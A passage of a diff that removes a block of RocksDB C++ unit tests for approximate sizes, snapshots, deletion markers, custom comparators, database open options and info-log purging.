-    ASSERT_OK(Put(Key(1000 + i), RandomString(&rnd, 1024)));
-  }
-
-  start = Key(500);
-  end = Key(600);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_EQ(size, 0);
-
-  start = Key(100);
-  end = Key(1020);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_GT(size, 6000);
-
-  options.max_write_buffer_number = 8;
-  options.min_write_buffer_number_to_merge = 5;
-  options.write_buffer_size = 1024 * N;  // Not very large
-  DestroyAndReopen(options);
-
-  int keys[N * 3];
-  for (int i = 0; i < N; i++) {
-    keys[i * 3] = i * 5;
-    keys[i * 3 + 1] = i * 5 + 1;
-    keys[i * 3 + 2] = i * 5 + 2;
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  for (int i = 0; i < N * 3; i++) {
-    ASSERT_OK(Put(Key(keys[i] + 1000), RandomString(&rnd, 1024)));
-  }
-
-  start = Key(100);
-  end = Key(300);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_EQ(size, 0);
-
-  start = Key(1050);
-  end = Key(1080);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_GT(size, 6000);
-
-  start = Key(2100);
-  end = Key(2300);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_EQ(size, 0);
-
-  start = Key(1050);
-  end = Key(1080);
-  r = Range(start, end);
-  uint64_t size_with_mt, size_without_mt;
-  db_->GetApproximateSizes(&r, 1, &size_with_mt, include_both);
-  ASSERT_GT(size_with_mt, 6000);
-  db_->GetApproximateSizes(&r, 1, &size_without_mt);
-  ASSERT_EQ(size_without_mt, 0);
-
-  Flush();
-
-  for (int i = 0; i < N; i++) {
-    ASSERT_OK(Put(Key(i + 1000), RandomString(&rnd, 1024)));
-  }
-
-  start = Key(1050);
-  end = Key(1080);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size_with_mt, include_both);
-  db_->GetApproximateSizes(&r, 1, &size_without_mt);
-  ASSERT_GT(size_with_mt, size_without_mt);
-  ASSERT_GT(size_without_mt, 6000);
-}
-
-TEST_F(DBTest, GetApproximateMemTableStats) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  const int N = 128;
-  Random rnd(301);
-  for (int i = 0; i < N; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-  }
-
-  uint64_t count;
-  uint64_t size;
-
-  std::string start = Key(50);
-  std::string end = Key(60);
-  Range r(start, end);
-  db_->GetApproximateMemTableStats(r, &count, &size);
-  ASSERT_GT(count, 0);
-  ASSERT_LE(count, N);
-  ASSERT_GT(size, 6000);
-  ASSERT_LT(size, 204800);
-
-  start = Key(500);
-  end = Key(600);
-  r = Range(start, end);
-  db_->GetApproximateMemTableStats(r, &count, &size);
-  ASSERT_EQ(count, 0);
-  ASSERT_EQ(size, 0);
-
-  Flush();
-
-  start = Key(50);
-  end = Key(60);
-  r = Range(start, end);
-  db_->GetApproximateMemTableStats(r, &count, &size);
-  ASSERT_EQ(count, 0);
-  ASSERT_EQ(size, 0);
-
-  for (int i = 0; i < N; i++) {
-    ASSERT_OK(Put(Key(1000 + i), RandomString(&rnd, 1024)));
-  }
-
-  start = Key(100);
-  end = Key(1020);
-  r = Range(start, end);
-  db_->GetApproximateMemTableStats(r, &count, &size);
-  ASSERT_GT(count, 20);
-  ASSERT_GT(size, 6000);
-}
-
-TEST_F(DBTest, ApproximateSizes) {
-  do {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 100000000;  // Large write buffer
-    options.compression = kNoCompression;
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    ASSERT_TRUE(Between(Size("", "xyz", 1), 0, 0));
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    ASSERT_TRUE(Between(Size("", "xyz", 1), 0, 0));
-
-    // Write 8MB (80 values, each 100K)
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    const int N = 80;
-    static const int S1 = 100000;
-    static const int S2 = 105000;  // Allow some expansion from metadata
-    Random rnd(301);
-    for (int i = 0; i < N; i++) {
-      ASSERT_OK(Put(1, Key(i), RandomString(&rnd, S1)));
-    }
-
-    // 0 because GetApproximateSizes() does not account for memtable space
-    ASSERT_TRUE(Between(Size("", Key(50), 1), 0, 0));
-
-    // Check sizes across recovery by reopening a few times
-    for (int run = 0; run < 3; run++) {
-      ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-      for (int compact_start = 0; compact_start < N; compact_start += 10) {
-        for (int i = 0; i < N; i += 10) {
-          ASSERT_TRUE(Between(Size("", Key(i), 1), S1 * i, S2 * i));
-          ASSERT_TRUE(Between(Size("", Key(i) + ".suffix", 1), S1 * (i + 1),
-                              S2 * (i + 1)));
-          ASSERT_TRUE(Between(Size(Key(i), Key(i + 10), 1), S1 * 10, S2 * 10));
-        }
-        ASSERT_TRUE(Between(Size("", Key(50), 1), S1 * 50, S2 * 50));
-        ASSERT_TRUE(
-            Between(Size("", Key(50) + ".suffix", 1), S1 * 50, S2 * 50));
-
-        std::string cstart_str = Key(compact_start);
-        std::string cend_str = Key(compact_start + 9);
-        Slice cstart = cstart_str;
-        Slice cend = cend_str;
-        dbfull()->TEST_CompactRange(0, &cstart, &cend, handles_[1]);
-      }
-
-      ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-      ASSERT_GT(NumTableFilesAtLevel(1, 1), 0);
-    }
-    // ApproximateOffsetOf() is not yet implemented in plain table format.
-  } while (ChangeOptions(kSkipUniversalCompaction | kSkipFIFOCompaction |
-                         kSkipPlainTable | kSkipHashIndex));
-}
-
-TEST_F(DBTest, ApproximateSizes_MixOfSmallAndLarge) {
-  do {
-    Options options = CurrentOptions();
-    options.compression = kNoCompression;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Random rnd(301);
-    std::string big1 = RandomString(&rnd, 100000);
-    ASSERT_OK(Put(1, Key(0), RandomString(&rnd, 10000)));
-    ASSERT_OK(Put(1, Key(1), RandomString(&rnd, 10000)));
-    ASSERT_OK(Put(1, Key(2), big1));
-    ASSERT_OK(Put(1, Key(3), RandomString(&rnd, 10000)));
-    ASSERT_OK(Put(1, Key(4), big1));
-    ASSERT_OK(Put(1, Key(5), RandomString(&rnd, 10000)));
-    ASSERT_OK(Put(1, Key(6), RandomString(&rnd, 300000)));
-    ASSERT_OK(Put(1, Key(7), RandomString(&rnd, 10000)));
-
-    // Check sizes across recovery by reopening a few times
-    for (int run = 0; run < 3; run++) {
-      ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-      ASSERT_TRUE(Between(Size("", Key(0), 1), 0, 0));
-      ASSERT_TRUE(Between(Size("", Key(1), 1), 10000, 11000));
-      ASSERT_TRUE(Between(Size("", Key(2), 1), 20000, 21000));
-      ASSERT_TRUE(Between(Size("", Key(3), 1), 120000, 121000));
-      ASSERT_TRUE(Between(Size("", Key(4), 1), 130000, 131000));
-      ASSERT_TRUE(Between(Size("", Key(5), 1), 230000, 231000));
-      ASSERT_TRUE(Between(Size("", Key(6), 1), 240000, 241000));
-      ASSERT_TRUE(Between(Size("", Key(7), 1), 540000, 541000));
-      ASSERT_TRUE(Between(Size("", Key(8), 1), 550000, 560000));
-
-      ASSERT_TRUE(Between(Size(Key(3), Key(5), 1), 110000, 111000));
-
-      dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-    }
-    // ApproximateOffsetOf() is not yet implemented in plain table format.
-  } while (ChangeOptions(kSkipPlainTable));
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, Snapshot) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions(options_override));
-    Put(0, "foo", "0v1");
-    Put(1, "foo", "1v1");
-
-    const Snapshot* s1 = db_->GetSnapshot();
-    ASSERT_EQ(1U, GetNumSnapshots());
-    uint64_t time_snap1 = GetTimeOldestSnapshots();
-    ASSERT_GT(time_snap1, 0U);
-    Put(0, "foo", "0v2");
-    Put(1, "foo", "1v2");
-
-    env_->addon_time_.fetch_add(1);
-
-    const Snapshot* s2 = db_->GetSnapshot();
-    ASSERT_EQ(2U, GetNumSnapshots());
-    ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-    Put(0, "foo", "0v3");
-    Put(1, "foo", "1v3");
-
-    {
-      ManagedSnapshot s3(db_);
-      ASSERT_EQ(3U, GetNumSnapshots());
-      ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-
-      Put(0, "foo", "0v4");
-      Put(1, "foo", "1v4");
-      ASSERT_EQ("0v1", Get(0, "foo", s1));
-      ASSERT_EQ("1v1", Get(1, "foo", s1));
-      ASSERT_EQ("0v2", Get(0, "foo", s2));
-      ASSERT_EQ("1v2", Get(1, "foo", s2));
-      ASSERT_EQ("0v3", Get(0, "foo", s3.snapshot()));
-      ASSERT_EQ("1v3", Get(1, "foo", s3.snapshot()));
-      ASSERT_EQ("0v4", Get(0, "foo"));
-      ASSERT_EQ("1v4", Get(1, "foo"));
-    }
-
-    ASSERT_EQ(2U, GetNumSnapshots());
-    ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-    ASSERT_EQ("0v1", Get(0, "foo", s1));
-    ASSERT_EQ("1v1", Get(1, "foo", s1));
-    ASSERT_EQ("0v2", Get(0, "foo", s2));
-    ASSERT_EQ("1v2", Get(1, "foo", s2));
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-
-    db_->ReleaseSnapshot(s1);
-    ASSERT_EQ("0v2", Get(0, "foo", s2));
-    ASSERT_EQ("1v2", Get(1, "foo", s2));
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-    ASSERT_EQ(1U, GetNumSnapshots());
-    ASSERT_LT(time_snap1, GetTimeOldestSnapshots());
-
-    db_->ReleaseSnapshot(s2);
-    ASSERT_EQ(0U, GetNumSnapshots());
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-  } while (ChangeOptions(kSkipHashCuckoo));
-}
-
-TEST_F(DBTest, HiddenValuesAreRemoved) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    Options options = CurrentOptions(options_override);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    Random rnd(301);
-    FillLevels("a", "z", 1);
-
-    std::string big = RandomString(&rnd, 50000);
-    Put(1, "foo", big);
-    Put(1, "pastfoo", "v");
-    const Snapshot* snapshot = db_->GetSnapshot();
-    Put(1, "foo", "tiny");
-    Put(1, "pastfoo2", "v2");  // Advance sequence number one more
-
-    ASSERT_OK(Flush(1));
-    ASSERT_GT(NumTableFilesAtLevel(0, 1), 0);
-
-    ASSERT_EQ(big, Get(1, "foo", snapshot));
-    ASSERT_TRUE(Between(Size("", "pastfoo", 1), 50000, 60000));
-    db_->ReleaseSnapshot(snapshot);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ tiny, " + big + " ]");
-    Slice x("x");
-    dbfull()->TEST_CompactRange(0, nullptr, &x, handles_[1]);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ tiny ]");
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    ASSERT_GE(NumTableFilesAtLevel(1, 1), 1);
-    dbfull()->TEST_CompactRange(1, nullptr, &x, handles_[1]);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ tiny ]");
-
-    ASSERT_TRUE(Between(Size("", "pastfoo", 1), 0, 1000));
-    // ApproximateOffsetOf() is not yet implemented in plain table format,
-    // which is used by Size().
-    // skip HashCuckooRep as it does not support snapshot
-  } while (ChangeOptions(kSkipUniversalCompaction | kSkipFIFOCompaction |
-                         kSkipPlainTable | kSkipHashCuckoo));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, UnremovableSingleDelete) {
-  // If we compact:
-  //
-  // Put(A, v1) Snapshot SingleDelete(A) Put(A, v2)
-  //
-  // We do not want to end up with:
-  //
-  // Put(A, v1) Snapshot Put(A, v2)
-  //
-  // Because a subsequent SingleDelete(A) would delete the Put(A, v2)
-  // but not Put(A, v1), so Get(A) would return v1.
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    Options options = CurrentOptions(options_override);
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Put(1, "foo", "first");
-    const Snapshot* snapshot = db_->GetSnapshot();
-    SingleDelete(1, "foo");
-    Put(1, "foo", "second");
-    ASSERT_OK(Flush(1));
-
-    ASSERT_EQ("first", Get(1, "foo", snapshot));
-    ASSERT_EQ("second", Get(1, "foo"));
-
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ("[ second, SDEL, first ]", AllEntriesFor("foo", 1));
-
-    SingleDelete(1, "foo");
-
-    ASSERT_EQ("first", Get(1, "foo", snapshot));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-
-    ASSERT_EQ("first", Get(1, "foo", snapshot));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-    db_->ReleaseSnapshot(snapshot);
-    // Skip HashCuckooRep as it does not support single delete.  FIFO and
-    // universal compaction do not apply to the test case.  Skip MergePut
-    // because single delete does not get removed when it encounters a merge.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, DeletionMarkers1) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Put(1, "foo", "v1");
-  ASSERT_OK(Flush(1));
-  const int last = 2;
-  MoveFilesToLevel(last, 1);
-  // foo => v1 is now in last level
-  ASSERT_EQ(NumTableFilesAtLevel(last, 1), 1);
-
-  // Place a table at level last-1 to prevent merging with preceding mutation
-  Put(1, "a", "begin");
-  Put(1, "z", "end");
-  Flush(1);
-  MoveFilesToLevel(last - 1, 1);
-  ASSERT_EQ(NumTableFilesAtLevel(last, 1), 1);
-  ASSERT_EQ(NumTableFilesAtLevel(last - 1, 1), 1);
-
-  Delete(1, "foo");
-  Put(1, "foo", "v2");
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, DEL, v1 ]");
-  ASSERT_OK(Flush(1));  // Moves to level last-2
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, v1 ]");
-  Slice z("z");
-  dbfull()->TEST_CompactRange(last - 2, nullptr, &z, handles_[1]);
-  // DEL eliminated, but v1 remains because we aren't compacting that level
-  // (DEL can be eliminated because v2 hides v1).
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, v1 ]");
-  dbfull()->TEST_CompactRange(last - 1, nullptr, nullptr, handles_[1]);
-  // Merging last-1 w/ last, so we are the base level for "foo", so
-  // DEL is removed.  (as is v1).
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2 ]");
-}
-
-TEST_F(DBTest, DeletionMarkers2) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Put(1, "foo", "v1");
-  ASSERT_OK(Flush(1));
-  const int last = 2;
-  MoveFilesToLevel(last, 1);
-  // foo => v1 is now in last level
-  ASSERT_EQ(NumTableFilesAtLevel(last, 1), 1);
-
-  // Place a table at level last-1 to prevent merging with preceding mutation
-  Put(1, "a", "begin");
-  Put(1, "z", "end");
-  Flush(1);
-  MoveFilesToLevel(last - 1, 1);
-  ASSERT_EQ(NumTableFilesAtLevel(last, 1), 1);
-  ASSERT_EQ(NumTableFilesAtLevel(last - 1, 1), 1);
-
-  Delete(1, "foo");
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v1 ]");
-  ASSERT_OK(Flush(1));  // Moves to level last-2
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v1 ]");
-  dbfull()->TEST_CompactRange(last - 2, nullptr, nullptr, handles_[1]);
-  // DEL kept: "last" file overlaps
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v1 ]");
-  dbfull()->TEST_CompactRange(last - 1, nullptr, nullptr, handles_[1]);
-  // Merging last-1 w/ last, so we are the base level for "foo", so
-  // DEL is removed.  (as is v1).
-  ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-}
-
-TEST_F(DBTest, OverlapInLevel0) {
-  do {
-    Options options = CurrentOptions();
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Fill levels 1 and 2 to disable the pushing of new memtables to levels >
-    // 0.
-    ASSERT_OK(Put(1, "100", "v100"));
-    ASSERT_OK(Put(1, "999", "v999"));
-    Flush(1);
-    MoveFilesToLevel(2, 1);
-    ASSERT_OK(Delete(1, "100"));
-    ASSERT_OK(Delete(1, "999"));
-    Flush(1);
-    MoveFilesToLevel(1, 1);
-    ASSERT_EQ("0,1,1", FilesPerLevel(1));
-
-    // Make files spanning the following ranges in level-0:
-    //  files[0]  200 .. 900
-    //  files[1]  300 .. 500
-    // Note that files are sorted by smallest key.
-    ASSERT_OK(Put(1, "300", "v300"));
-    ASSERT_OK(Put(1, "500", "v500"));
-    Flush(1);
-    ASSERT_OK(Put(1, "200", "v200"));
-    ASSERT_OK(Put(1, "600", "v600"));
-    ASSERT_OK(Put(1, "900", "v900"));
-    Flush(1);
-    ASSERT_EQ("2,1,1", FilesPerLevel(1));
-
-    // Compact away the placeholder files we created initially
-    dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    dbfull()->TEST_CompactRange(2, nullptr, nullptr, handles_[1]);
-    ASSERT_EQ("2", FilesPerLevel(1));
-
-    // Do a memtable compaction.  Before bug-fix, the compaction would
-    // not detect the overlap with level-0 files and would incorrectly place
-    // the deletion in a deeper level.
-    ASSERT_OK(Delete(1, "600"));
-    Flush(1);
-    ASSERT_EQ("3", FilesPerLevel(1));
-    ASSERT_EQ("NOT_FOUND", Get(1, "600"));
-  } while (ChangeOptions(kSkipUniversalCompaction | kSkipFIFOCompaction));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, ComparatorCheck) {
-  class NewComparator : public Comparator {
-   public:
-    virtual const char* Name() const override {
-      return "rocksdb.NewComparator";
-    }
-    virtual int Compare(const Slice& a, const Slice& b) const override {
-      return BytewiseComparator()->Compare(a, b);
-    }
-    virtual void FindShortestSeparator(std::string* s,
-                                       const Slice& l) const override {
-      BytewiseComparator()->FindShortestSeparator(s, l);
-    }
-    virtual void FindShortSuccessor(std::string* key) const override {
-      BytewiseComparator()->FindShortSuccessor(key);
-    }
-  };
-  Options new_options, options;
-  NewComparator cmp;
-  do {
-    options = CurrentOptions();
-    CreateAndReopenWithCF({"pikachu"}, options);
-    new_options = CurrentOptions();
-    new_options.comparator = &cmp;
-    // only the non-default column family has non-matching comparator
-    Status s = TryReopenWithColumnFamilies(
-        {"default", "pikachu"}, std::vector<Options>({options, new_options}));
-    ASSERT_TRUE(!s.ok());
-    ASSERT_TRUE(s.ToString().find("comparator") != std::string::npos)
-        << s.ToString();
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTest, CustomComparator) {
-  class NumberComparator : public Comparator {
-   public:
-    virtual const char* Name() const override {
-      return "test.NumberComparator";
-    }
-    virtual int Compare(const Slice& a, const Slice& b) const override {
-      return ToNumber(a) - ToNumber(b);
-    }
-    virtual void FindShortestSeparator(std::string* s,
-                                       const Slice& l) const override {
-      ToNumber(*s);  // Check format
-      ToNumber(l);   // Check format
-    }
-    virtual void FindShortSuccessor(std::string* key) const override {
-      ToNumber(*key);  // Check format
-    }
-
-   private:
-    static int ToNumber(const Slice& x) {
-      // Check that there are no extra characters.
-      EXPECT_TRUE(x.size() >= 2 && x[0] == '[' && x[x.size() - 1] == ']')
-          << EscapeString(x);
-      int val;
-      char ignored;
-      EXPECT_TRUE(sscanf(x.ToString().c_str(), "[%i]%c", &val, &ignored) == 1)
-          << EscapeString(x);
-      return val;
-    }
-  };
-  Options new_options;
-  NumberComparator cmp;
-  do {
-    new_options = CurrentOptions();
-    new_options.create_if_missing = true;
-    new_options.comparator = &cmp;
-    new_options.write_buffer_size = 4096;  // Compact more often
-    new_options.arena_block_size = 4096;
-    new_options = CurrentOptions(new_options);
-    DestroyAndReopen(new_options);
-    CreateAndReopenWithCF({"pikachu"}, new_options);
-    ASSERT_OK(Put(1, "[10]", "ten"));
-    ASSERT_OK(Put(1, "[0x14]", "twenty"));
-    for (int i = 0; i < 2; i++) {
-      ASSERT_EQ("ten", Get(1, "[10]"));
-      ASSERT_EQ("ten", Get(1, "[0xa]"));
-      ASSERT_EQ("twenty", Get(1, "[20]"));
-      ASSERT_EQ("twenty", Get(1, "[0x14]"));
-      ASSERT_EQ("NOT_FOUND", Get(1, "[15]"));
-      ASSERT_EQ("NOT_FOUND", Get(1, "[0xf]"));
-      Compact(1, "[0]", "[9999]");
-    }
-
-    for (int run = 0; run < 2; run++) {
-      for (int i = 0; i < 1000; i++) {
-        char buf[100];
-        snprintf(buf, sizeof(buf), "[%d]", i * 10);
-        ASSERT_OK(Put(1, buf, buf));
-      }
-      Compact(1, "[0]", "[1000000]");
-    }
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTest, DBOpen_Options) {
-  Options options = CurrentOptions();
-  std::string dbname = test::TmpDir(env_) + "/db_options_test";
-  ASSERT_OK(DestroyDB(dbname, options));
-
-  // Does not exist, and create_if_missing == false: error
-  DB* db = nullptr;
-  options.create_if_missing = false;
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "does not exist") != nullptr);
-  ASSERT_TRUE(db == nullptr);
-
-  // Does not exist, and create_if_missing == true: OK
-  options.create_if_missing = true;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-  ASSERT_TRUE(db != nullptr);
-
-  delete db;
-  db = nullptr;
-
-  // Does exist, and error_if_exists == true: error
-  options.create_if_missing = false;
-  options.error_if_exists = true;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "exists") != nullptr);
-  ASSERT_TRUE(db == nullptr);
-
-  // Does exist, and error_if_exists == false: OK
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-  ASSERT_TRUE(db != nullptr);
-
-  delete db;
-  db = nullptr;
-}
-
-TEST_F(DBTest, DBOpen_Change_NumLevels) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-  ASSERT_TRUE(db_ != nullptr);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "a", "123"));
-  ASSERT_OK(Put(1, "b", "234"));
-  Flush(1);
-  MoveFilesToLevel(3, 1);
-  Close();
-
-  options.create_if_missing = false;
-  options.num_levels = 2;
-  Status s = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "Invalid argument") != nullptr);
-  ASSERT_TRUE(db_ == nullptr);
-}
-
-TEST_F(DBTest, DestroyDBMetaDatabase) {
-  std::string dbname = test::TmpDir(env_) + "/db_meta";
-  ASSERT_OK(env_->CreateDirIfMissing(dbname));
-  std::string metadbname = MetaDatabaseName(dbname, 0);
-  ASSERT_OK(env_->CreateDirIfMissing(metadbname));
-  std::string metametadbname = MetaDatabaseName(metadbname, 0);
-  ASSERT_OK(env_->CreateDirIfMissing(metametadbname));
-
-  // Destroy previous versions if they exist. Using the long way.
-  Options options = CurrentOptions();
-  ASSERT_OK(DestroyDB(metametadbname, options));
-  ASSERT_OK(DestroyDB(metadbname, options));
-  ASSERT_OK(DestroyDB(dbname, options));
-
-  // Setup databases
-  DB* db = nullptr;
-  ASSERT_OK(DB::Open(options, dbname, &db));
-  delete db;
-  db = nullptr;
-  ASSERT_OK(DB::Open(options, metadbname, &db));
-  delete db;
-  db = nullptr;
-  ASSERT_OK(DB::Open(options, metametadbname, &db));
-  delete db;
-  db = nullptr;
-
-  // Delete databases
-  ASSERT_OK(DestroyDB(dbname, options));
-
-  // Check if deletion worked.
-  options.create_if_missing = false;
-  ASSERT_TRUE(!(DB::Open(options, dbname, &db)).ok());
-  ASSERT_TRUE(!(DB::Open(options, metadbname, &db)).ok());
-  ASSERT_TRUE(!(DB::Open(options, metametadbname, &db)).ok());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, SnapshotFiles) {
-  do {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 100000000;  // Large write buffer
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Random rnd(301);
-
-    // Write 8MB (80 values, each 100K)
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    std::vector<std::string> values;
-    for (int i = 0; i < 80; i++) {
-      values.push_back(RandomString(&rnd, 100000));
-      ASSERT_OK(Put((i < 40), Key(i), values[i]));
-    }
-
-    // assert that nothing makes it to disk yet.
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-
-    // get a file snapshot
-    uint64_t manifest_number = 0;
-    uint64_t manifest_size = 0;
-    std::vector<std::string> files;
-    dbfull()->DisableFileDeletions();
-    dbfull()->GetLiveFiles(files, &manifest_size);
-
-    // CURRENT, MANIFEST, OPTIONS, *.sst files (one for each CF)
-    ASSERT_EQ(files.size(), 5U);
-
-    uint64_t number = 0;
-    FileType type;
-
-    // copy these files to a new snapshot directory
-    std::string snapdir = dbname_ + ".snapdir/";
-    ASSERT_OK(env_->CreateDirIfMissing(snapdir));
-
-    for (size_t i = 0; i < files.size(); i++) {
-      // our clients require that GetLiveFiles returns
-      // files with "/" as first character!
-      ASSERT_EQ(files[i][0], '/');
-      std::string src = dbname_ + files[i];
-      std::string dest = snapdir + files[i];
-
-      uint64_t size;
-      ASSERT_OK(env_->GetFileSize(src, &size));
-
-      // record the number and the size of the
-      // latest manifest file
-      if (ParseFileName(files[i].substr(1), &number, &type)) {
-        if (type == kDescriptorFile) {
-          if (number > manifest_number) {
-            manifest_number = number;
-            ASSERT_GE(size, manifest_size);
-            size = manifest_size;  // copy only valid MANIFEST data
-          }
-        }
-      }
-      CopyFile(src, dest, size);
-    }
-
-    // release file snapshot
-    dbfull()->DisableFileDeletions();
-    // overwrite one key, this key should not appear in the snapshot
-    std::vector<std::string> extras;
-    for (unsigned int i = 0; i < 1; i++) {
-      extras.push_back(RandomString(&rnd, 100000));
-      ASSERT_OK(Put(0, Key(i), extras[i]));
-    }
-
-    // verify that data in the snapshot are correct
-    std::vector<ColumnFamilyDescriptor> column_families;
-    column_families.emplace_back("default", ColumnFamilyOptions());
-    column_families.emplace_back("pikachu", ColumnFamilyOptions());
-    std::vector<ColumnFamilyHandle*> cf_handles;
-    DB* snapdb;
-    DBOptions opts;
-    opts.env = env_;
-    opts.create_if_missing = false;
-    Status stat =
-        DB::Open(opts, snapdir, column_families, &cf_handles, &snapdb);
-    ASSERT_OK(stat);
-
-    ReadOptions roptions;
-    std::string val;
-    for (unsigned int i = 0; i < 80; i++) {
-      stat = snapdb->Get(roptions, cf_handles[i < 40], Key(i), &val);
-      ASSERT_EQ(values[i].compare(val), 0);
-    }
-    for (auto cfh : cf_handles) {
-      delete cfh;
-    }
-    delete snapdb;
-
-    // look at the new live files after we added an 'extra' key
-    // and after we took the first snapshot.
-    uint64_t new_manifest_number = 0;
-    uint64_t new_manifest_size = 0;
-    std::vector<std::string> newfiles;
-    dbfull()->DisableFileDeletions();
-    dbfull()->GetLiveFiles(newfiles, &new_manifest_size);
-
-    // find the new manifest file. assert that this manifest file is
-    // the same one as in the previous snapshot. But its size should be
-    // larger because we added an extra key after taking the
-    // previous shapshot.
-    for (size_t i = 0; i < newfiles.size(); i++) {
-      std::string src = dbname_ + "/" + newfiles[i];
-      // record the lognumber and the size of the
-      // latest manifest file
-      if (ParseFileName(newfiles[i].substr(1), &number, &type)) {
-        if (type == kDescriptorFile) {
-          if (number > new_manifest_number) {
-            uint64_t size;
-            new_manifest_number = number;
-            ASSERT_OK(env_->GetFileSize(src, &size));
-            ASSERT_GE(size, new_manifest_size);
-          }
-        }
-      }
-    }
-    ASSERT_EQ(manifest_number, new_manifest_number);
-    ASSERT_GT(new_manifest_size, manifest_size);
-
-    // release file snapshot
-    dbfull()->DisableFileDeletions();
-  } while (ChangeCompactOptions());
-}
-#endif
-
-TEST_F(DBTest, PurgeInfoLogs) {
-  Options options = CurrentOptions();
-  options.keep_log_file_num = 5;
-  options.create_if_missing = true;
-  for (int mode = 0; mode <= 1; mode++) {
-    if (mode == 1) {
-      options.db_log_dir = dbname_ + "_logs";
-      env_->CreateDirIfMissing(options.db_log_dir);
-    } else {
-      options.db_log_dir = "";
-    }
-    for (int i = 0; i < 8; i++) {
-      Reopen(options);
-    }
-
-    std::vector<std::string> files;
-    env_->GetChildren(options.db_log_dir.empty() ? dbname_ : options.db_log_dir,
-                      &files);
-    int info_log_count = 0;
-    for (std::string file : files) {
-      if (file.find("LOG") != std::string::npos) {
-        info_log_count++;
-      }
-    }
-    ASSERT_EQ(5, info_log_count);
-
-    Destroy(options);
